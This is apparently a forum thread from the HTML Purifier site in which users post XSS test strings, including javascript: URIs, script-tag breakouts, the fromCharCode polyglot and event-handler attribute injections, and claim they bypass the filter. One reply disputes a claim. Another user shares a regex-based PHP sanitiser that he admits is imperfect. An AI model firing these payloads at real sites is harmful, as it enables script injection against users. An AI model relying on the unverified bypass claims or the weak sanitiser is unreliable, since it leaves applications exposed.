Welcome! » Log In » Create A New Profile

This code works on htmlpurifier

Posted by Saud 
Saud
This code works on htmlpurifier
May 19, 2009 12:57AM

i got it from http://ha.ckers.org/xss.html and it works on my form.

Saud
Re: This code works on htmlpurifier
May 19, 2009 12:58AM
<IMG SRC="javascript:alert(&#039;XSS&#039;);">

i got it from http://ha.ckers.org/xss.html and it works on my form.

Saud
Re: This code works on htmlpurifier
May 19, 2009 01:07AM

This xss code works too

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
Re: This code works on htmlpurifier
May 19, 2009 01:11AM

Uhhh... no it doesn't.

Re: This code works on htmlpurifier
May 19, 2009 01:12AM
Woogie
Re: This code works on htmlpurifier
February 04, 2010 09:25PM

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>

Woogie
Re: This code works on htmlpurifier
February 04, 2010 09:27PM
Woogie
Re: This code works on htmlpurifier
February 04, 2010 09:29PM
Woogie
Re: This code works on htmlpurifier
February 04, 2010 09:33PM

žscriptualert(EXSSE)ž/scriptu

Woogie
Re: This code works on htmlpurifier
February 04, 2010 09:33PM

very nice

aeno
Re: This code works on htmlpurifier
July 15, 2010 02:06PM
<a href="http://aeno.co.cc/abc/" target="_blank">aeno.co.cc/abc/</a>
Philip
Re: This code works on htmlpurifier
August 30, 2011 07:27AM

'onmouseover=prompt(934419) bad='

Brian
Re: This code works on htmlpurifier
September 14, 2011 12:36AM

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

al
Re: This code works on htmlpurifier
November 05, 2011 08:39AM

jjjj

electrocity
Re: This code works on htmlpurifier
November 26, 2011 07:50AM

" onclick='alert(50)' "

But i can't test it here, it's only in a hmtl input field. saved to database and rerender

THe code with tags are filtered correctly. i cannont proove it here, but all my tests are working.

i used this to prevent all javascript .

				$value =	preg_replace(&#039;@<[\/\!]*?[^<>]*?>@si&#039;,&#039;&#039;,$value);//remove all html tags
				$value =	(string)preg_replace(&#039;#on[a-z](.+?)\)#si&#039;,&#039;&#039;,$value);//replace start of script onclick() onload()...
				$value = trim(str_replace(&#039;"&#039;, &#039; &#039;, $value),"&#039;") ;
				$value =	(string)preg_replace(&#039;#^\&#039;#si&#039;,&#039;&#039;,$value);//replace &#039; at start

BUt it's not perfect because this can remove unwanted chars.

Author:
Your Email:

Subject:

HTML input is enabled. Make sure you escape all HTML and angled brackets with &lt; and &gt;.

Auto-paragraphing is enabled. Double newlines will be converted to paragraphs; for single newlines, use the pre tag.

Allowed tags: a, abbr, acronym, b, blockquote, caption, cite, code, dd, del, dfn, div, dl, dt, em, i, ins, kbd, li, ol, p, pre, s, strike, strong, sub, sup, table, tbody, td, tfoot, th, thead, tr, tt, u, ul, var.

For inputting literal code such as HTML and PHP for display, use CDATA tags to auto-escape your angled brackets, and pre to preserve newlines:

<pre><![CDATA[
Place code here
]]></pre>

Power users, you can hide this notice with:

.htmlpurifier-help {display:none;}

Message: